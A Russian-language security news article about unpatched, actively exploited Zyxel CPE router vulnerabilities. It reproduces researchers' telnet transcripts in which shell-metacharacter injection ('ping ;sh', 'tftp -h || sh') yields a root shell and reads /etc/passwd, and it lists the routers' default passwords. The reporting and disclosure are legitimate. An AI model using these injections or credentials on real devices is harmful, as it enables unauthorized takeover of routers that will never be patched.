Zyxel выпустила рекомендацию по безопасности, которая описывает активно эксплуатируемые уязвимости в маршрутизаторах CPE. Компания предупредила, что не планирует выпускать исправления, и призвала пользователей перейти на более новые модели.
Впервые о двух уязвимостях в июле 2024 года сообщили исследователи VulnCheck. На прошлой неделе их коллеги из GreyNoise заявили, что видели попытки их эксплуатации.
В обновлении VulnCheck представила полную информацию об уязвимостях, атаки с использованием которых направлены на получение доступа к сетям:
CVE-2024-40891 — аутентифицированные пользователи могут использовать инъекцию команд Telnet из-за неправильной проверки команд в libcms_cli.so. Некоторые (например, ifconfig, ping, tftp) передаются без проверки в функцию выполнения оболочки, что позволяет выполнять произвольный код с использованием метасимволов оболочки;
albinolobster@mournland:~$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
Zyxel VMG4325-B10A
Login: zyuser
Password:
> tftp -h || sh
tftp: invalid option -- h
BusyBox v1.17.2 (2017-06-15 12:25:20 CST) multi-call binary.
Usage: tftp [OPTIONS] HOST [PORT]
Transfer a file from/to tftp server
Options:
-l FILE Local FILE
-r FILE Remote FILE
-g Get file
-p Put file
-g -t i -f filename server_ip Get (flash) broadcom or whole image to modem
-g -t c -f filename server_ip Get (flash) config file to modem
-p -t f -f filename server_ip Put (backup) config file to tftpd server
BusyBox v1.17.2 (2017-06-15 12:25:20 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# ls -l
drwxr-xr-x 3 supervis root 0 Jan 1 1970 app
drwxr-xr-x 2 supervis root 0 Jun 15 2017 bin
-rw-r--r-- 1 supervis root 163928 Jun 15 2017 cferam.000
drwxr-xr-x 4 supervis root 0 Jan 1 1970 data
drwxrwxr-x 4 supervis root 0 Jun 15 2017 dev
drwxr-xr-x 10 supervis root 0 Jun 15 2017 etc
drwxr-xr-x 2 supervis root 0 Jan 1 1970 home
drwxrwxr-x 6 supervis root 0 Jun 15 2017 lib
lrwxrwxrwx 1 supervis root 11 Jun 15 2017 linuxrc -> bin/busybox
drwxr-xr-x 2 supervis root 0 Jan 1 1970 log
drwxr-xr-x 2 supervis root 0 Jan 3 20:29 mnt
drwxrwxr-x 5 supervis root 0 Jun 15 2017 opt
dr-xr-xr-x 90 supervis root 0 Jan 1 1970 proc
drwxrwxr-x 2 supervis root 0 Jun 15 2017 sbin
drwxr-xr-x 11 supervis root 0 Jan 1 1970 sys
lrwxrwxrwx 1 supervis root 8 Jun 15 2017 tmp -> /var/tmp
drwxrwxr-x 4 supervis root 0 Jun 15 2017 usr
drwxr-xr-x 14 supervis root 0 Jan 3 22:09 var
-rw-rw-r-- 1 supervis root 1446798 Jun 15 2017 vmlinux.lz
drwxrwxr-x 4 supervis root 0 Jun 15 2017 webs
#
CVE-2025-0890 — устройства используют слабые учётные данные по умолчанию (admin:1234, zyuser:1234, supervisor:zyad1234), которые многие пользователи не меняют. Учётная запись supervisor имеет скрытые привилегии, предоставляя полный доступ к системе, в то время как zyuser может использовать CVE-2024-40891 для удалённого выполнения кода.
<X_404A03_LoginCfg>
<AdminUserName>supervisor</AdminUserName>
<AdminPassword>enlhZDEyMzQ=</AdminPassword>
<X_404A03_LoginGroupNumberOfEntries>2</X_404A03_LoginGroupNumberOfEntries>
<X_404A03_Login_Group instance="1">
<Privilege>broadband,wireless,homeNetworking,routing,qos,nat,dns,igmpSetting,halfBridge,intfGrp,usbService,firewall,macFilter,parentalControl,schedulerRule,certificates,ipsecVPN,log,trafficStatus,arpTable,routeTable,igmpGroupStatus,xdslStatistics,system,userAccount,remoteMGMT,tr069Client,tr064,time,emailNotification,logSetting,firmwareUpgrade,configuration,reboot,disagnostic,HelpDesk,wizard,sniffer,snmp</Privilege>
<Name>Administrator</Name>
<ConsoleLevel>2</ConsoleLevel>
<Use_Login_Info instance="1">
<UserName>admin</UserName>
<Password>MTIzNAA=</Password>
<LoginFailCount>0</LoginFailCount>
<LoginFailCountLeft>1</LoginFailCountLeft>
</Use_Login_Info>
<Use_Login_Info nextInstance="2" ></Use_Login_Info>
</X_404A03_Login_Group>
<X_404A03_Login_Group instance="2">
<GroupKey>2</GroupKey>
<Privilege>broadband,wireless,homeNetworking,routing,qos,nat,dns,igmpSetting,halfBridge,intfGrp,usbService,firewall,macFilter,parentalControl,schedulerRule,certificates,ipsecVPN,log,trafficStatus,arpTable,routeTable,igmpGroupStatus,xdslStatistics,system,userAccount,remoteMGMT,tr069Client,tr064,time,emailNotification,logSetting,firmwareUpgrade,configuration,reboot,disagnostic,HelpDesk,wizard,sniffer,snmp</Privilege>
<Name>User</Name>
<ConsoleLevel>2</ConsoleLevel>
<Use_Login_Info instance="1">
<UserName>zyuser</UserName>
<Password>MTIzNAA=</Password>
<LoginFailCount>0</LoginFailCount>
<LoginFailCountLeft>1</LoginFailCountLeft>
</Use_Login_Info>
<Use_Login_Info nextInstance="2" ></Use_Login_Info>
</X_404A03_Login_Group>
<X_404A03_Login_Group nextInstance="3" ></X_404A03_Login_Group>
</X_404A03_LoginCfg>
В VulnCheck также продемонстрировали эксплойт атаки на маршрутизатор VMG4325-B10A с версией прошивки 1.00(AAFR.4)C0_20170615.
albinolobster@mournland:~$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.
Zyxel VMG4325-B10A
Login: zyuser
Password:
> sh
telnetd:error:694.808:processInput:472:unrecognized command sh
> ping ;sh
BusyBox v1.17.2 (2017-06-15 12:25:20 CST) multi-call binary.
Usage: ping [OPTIONS] HOST
Send ICMP ECHO_REQUEST packets to network hosts
Options:
-4, -6 Force IP or IPv6 name resolution
-c CNT Send only CNT pings
-s SIZE Send SIZE data bytes in packets (default:56)
-I IFACE/IP Use interface or IP address as source
-W SEC Seconds to wait for the first response (default:10)
(after all -c CNT packets are sent)
-w SEC Seconds until ping exits (default:infinite)
(can exit earlier with -c CNT)
-q Quiet, only displays output at start
and when finished
BusyBox v1.17.2 (2017-06-15 12:25:20 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# cat /etc/passwd
supervisor:gNvaS9TkEwk..:0:0:Administrator:/:/bin/sh
nobody:Mm/NWrZmKMrT2:99:99:nobody for ftp:/:/bin/false
admin:d7uXUhqhH7hew:100:0:Administrator:/:/bin/sh
zyuser:hH7gnvw0ISLfg:101:2:User:/:/bin/sh
«Хотя эти системы устарели и, по-видимому, давно не поддерживаются, они остаются весьма актуальными и используются по всему миру», — пояснили исследователи. Согласно подсчётам, уязвимости затрагивают более 1500 моделей Zyxel.
В Zyxel подтвердили эту информацию и отметили, что «модели VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300 и SBG3500, являются устаревшими продуктами, срок службы которых истёк много лет назад».
Производитель также рассказал о третьей уязвимости CVE-2024-40890, которая похожа на CVE-2024-40891.
В сентябре Zyxel выпустила обновления безопасности для устранения критической уязвимости, затрагивающей несколько моделей бизнес-маршрутизаторов. Потенциально она позволяет неаутентифицированным злоумышленникам выполнять инъекцию команд ОС. Уязвимость, отслеживаемая как CVE-2024-7261, представляет собой ошибку проверки входных данных из-за неправильной их обработки. Это позволяет удалённым злоумышленникам выполнять произвольные команды в операционной системе хоста.
Тогда же D-Link объявила, что не будет исправлять четыре уязвимости удалённого выполнения кода во всех версиях оборудования и прошивки маршрутизатора DIR-846W, так как эти продукты больше не поддерживаются.
В декабре сообщалось, что ботнеты Ficora и Capsaicin нарастили активность в атаках на маршрутизаторы D-Link, а новая версия на базе Mirai нацеливается на несколько сетевых видеорегистраторов и маршрутизаторов TP-Link с устаревшей прошивкой.
